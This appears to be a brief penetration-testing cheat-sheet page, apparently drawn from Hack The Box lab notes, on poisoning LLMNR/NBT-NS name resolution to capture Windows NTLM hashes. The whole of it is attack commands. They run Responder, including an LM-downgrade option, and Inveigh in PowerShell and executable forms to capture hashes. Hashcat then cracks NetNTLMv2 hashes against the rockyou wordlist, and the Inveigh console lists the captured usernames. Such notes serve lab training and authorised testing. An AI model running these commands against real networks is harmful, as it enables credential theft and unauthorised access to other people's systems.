Last updated 4 months ago
Was this helpful?
sudo responder -I ens224
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt
Responder.py -I eth0 -v --lm --disable-ess
NetNTLMv1 obtained - Convert the hash to NTLM - See Crack Hash
PS C:\htb> Import-Module .\Inveigh.ps1
PS C:\htb> Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
Invoke-Inveigh -IP '10.13.38.16' –NBNS Y –mDNS Y –Proxy Y -FileOutput Y -FileOutputDirectory 'c:\users\username\documents' -LogOutput Y
PS C:\htb> .\Inveigh.exe
Press ESC to enter/exit interactive console
GET NTLMV2UNIQUE
GET NTLMV2USERNAMES
More Tools: SMB